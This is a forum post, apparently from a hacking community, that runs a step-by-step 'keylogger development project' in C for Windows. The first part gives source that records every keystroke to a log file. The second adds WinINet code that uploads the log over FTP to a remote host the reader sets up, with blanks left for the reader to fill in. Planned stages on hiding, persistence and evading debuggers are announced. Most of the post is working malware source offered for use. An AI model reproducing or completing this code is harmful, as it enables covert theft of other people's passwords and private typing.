Keylogger Development Project
So Ive decided to do something a bit different. Instead of just a guide or submitting working code to the code bank, Im going to try and include as many people that want to take part.
The goal of this project is to familiarize people with c and the msdn libraries, it a hopefully fun and interactive way.
Ive written a basic outline of how to log keys using GetAsyncKey. It does not currently work (well it does but I wont post it all). Then I left instructions on usage and to do's for you to fix/add.
The first part Ive kept as simple as possible, (ie, you dont need to worry about pointers in this part), and hopefully commented where necessary. Note: It doesnt follow a perfectly sync logic structure as I tried to show a few different ways to capture keys. Note this should be easy.
Anywho:
Tasks: *Build a main function and link to the GetKey function. *Add additional functionality with extra keys. *Compile and run
Notes: Win XP 32 dev c++ 4.9.9.2 compiled it.
pastebin code http://pastebin.com/m1c84a696
#include <stdio.h>
#include <windows.h>
#include <winuser.h>
extern FILE *out_file;
/*
stdio's keylogger v.01
Compiled on Dev-C++ 4.9.9.2 WinXP 32 Bit
Key Debounce Line ***Just FYI***
while(GetAsyncKeyState(character)==-32768){}
MSDN KEY CODES
http://msdn.microsoft.com/en-us/library/ms927178.aspx
GetAsyncKeyState MSDN Reference
http://msdn.microsoft.com/en-us/library/ms646293(VS.85).aspx
To do: Add Numpad Support, Fnums support, Punctuation.
To use: Build a main function and link to this code.
*/
int GetKey()
{
short character;
Sleep(30);
/*ALPHA CHARACTERS V_KEY*/
for (character=0x41;character <= 0x5A;character++)
{
if (GetAsyncKeyState(character)==-32768)
{
out_file = fopen("data.log","a+");
/*UPPERCASE*/
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_LSHIFT))
{
while(GetAsyncKeyState(character)==-32768){}
fputc(character, out_file);
fclose(out_file);
}
/*LOWERCASE*/
else
{
while(GetAsyncKeyState(character)==-32768){}
fputc(character+0x20, out_file);
fclose(out_file);
}
}
}
/*Numerical Row*/
for (character=0x30;character <= 0x39;character++)
{
if (GetAsyncKeyState(character)==-32768)
{
out_file = fopen("data.log","a+");
/*Map Keys to Special Characters*/
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT))
{
while(GetAsyncKeyState(character)==-32768){}
switch(character)
{
case(0x31):
fputs("!", out_file);
fclose(out_file);
break;
case(0x32):
fputs("@", out_file);
fclose(out_file);
break;
case(0x33):
fputs("#", out_file);
fclose(out_file);
break;
case(0x34):
fputs("$", out_file);
fclose(out_file);
break;
case(0x35):
fputs("%", out_file);
fclose(out_file);
break;
case(0x36):
fputs("^", out_file);
fclose(out_file);
break;
case(0x37):
fputs("&", out_file);
fclose(out_file);
break;
case(0x38):
fputs("*", out_file);
fclose(out_file);
break;
case(0x39):
fputs("(", out_file);
fclose(out_file);
break;
case(0x30):
fputs(")", out_file);
fclose(out_file);
break;
default:
fputs("Error\n", out_file);
fclose(out_file);
break;
}
}
/*Defaulted Numbers*/
else
{
while(GetAsyncKeyState(character)==-32768){}
fputc(character, out_file);
fclose(out_file);
}
}
}
/* Catch Single Special Keys */
if (GetAsyncKeyState(VK_ESCAPE))
{
while(GetAsyncKeyState(VK_RETURN)==-32768){}
out_file = fopen("data.log","a+");
fputs("[ESC]", out_file);
fclose(out_file);
}
if (GetAsyncKeyState(VK_SPACE))
{
while(GetAsyncKeyState(VK_SPACE)==-32768){}
out_file = fopen("data.log","a+");
fputs(" ", out_file);
fclose(out_file);
}
if (GetAsyncKeyState(VK_RETURN))
{
while(GetAsyncKeyState(VK_RETURN)==-32768){}
out_file = fopen("data.log","a+");
fputs("\n", out_file);
fclose(out_file);
}
if (GetAsyncKeyState(VK_TAB))
{
while(GetAsyncKeyState(VK_TAB)==-32768){}
out_file = fopen("data.log","a+");
fputs("[TAB]", out_file);
fclose(out_file);
}
if (GetAsyncKeyState(VK_BACK))
{
while(GetAsyncKeyState(VK_BACK)==-32768){}
out_file = fopen("data.log","a+");
fputs("[BACK]", out_file);
fclose(out_file);
}
return 0;
}
I will update it with different things to do (hiding, persistence, sockets, etc) and add it here when I feel like it. Maybe a day or a month … who knows.
LEVEL 2
First I would like to hear feedback – positive/negative/indifferent/easy/hard/interesting/boring/etc. If many people just dont care either way Ill stop.
Now for part 2
Ive added a few functions that send logs over ftp when the file size hits 2048 Bytes (~ 1 page)
Hopefully if you are following along you have a main funtion that records keys to a file. So heres what you get this time.
Objectives are again stated in file but for some redundancy here they are again []Use the MSDN reference http://msdn.microsoft.com/en-us/library/aa384180(VS.85).aspx to fill in missing parameters []set up an ftp server or use a free web host (x10hosting is the one I used) []Find wininet compile flag (wont compile without it) []Update main function accordingly (I have provided a flowchart that my program follows) [*]Compile and run
#include <stdio.h>
#include <wininet.h>
#include <time.h>
/*Part 2
Sending logs
fill in the missing details using
http://msdn.microsoft.com/en-us/library/aa384180%28VS.85%29.aspx
find the linker compile flag for wininet wont compile without it
Use program flow provided and update main function accordingly.
*/
int SendLogs();
int TimeStamp();
extern FILE *out_file;
/*Declare Time Variables*/
struct tm *local;
time_t t;
/*Send Logs over FTP using wininet*/
int SendLogs()
{
t = time(NULL);
local = localtime(&t);
HINTERNET hInternet;
HINTERNET hConnect;
HINTERNET lRes;
bool pass;
hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
hConnect = InternetConnect(hInternet,"<ftphost>",INTERNET_DEFAULT_FTP_PORT,"what goes here?", "what goes here?", INTERNET_SERVICE_FTP,0,0);
pass = FtpPutFile(hConnect,"data.log",asctime(local),/*Find correct transfer type*/,0);
InternetCloseHandle(hConnect);
InternetCloseHandle(hInternet);
if(pass==false)return 1; //If send fails, it will loop again, Not clearing the Log
TimeStamp(); // If sends start new log with Time Stamp
return 0;
}
/*Send on file size > 2048 Bytes (~1page) */
int CheckSize()
{
int size;
out_file = fopen("data.log","<how should we open this??>");
fseek(out_file, 0L, SEEK_END);
size = ftell(out_file);
fseek(out_file, 0L, SEEK_SET);
fclose(out_file);
if (size > 2048)
{
SendLogs();
return 1; //debugging will stop keylogger after 1 send
}
return 0;
}
/*Time Stamps Log file, and Clears Current Content */
int TimeStamp()
{
t = time(NULL);
local = localtime(&t);
out_file=fopen("data.log", "w+");
fputs("------Start Logging Time ------\n", out_file);
fputs(asctime(local), out_file);
fputs("-------------------------------\n\n", out_file);
fclose(out_file);
return 0;
}
At this point you should have a basic logger that sends data ofter ftp to your host.
UPCOMING TASKS: simple string encryption so username/passwords/ftphosts arent plainly available under a debugger. Runtime CRC (cyclic redundancy check) & and fail function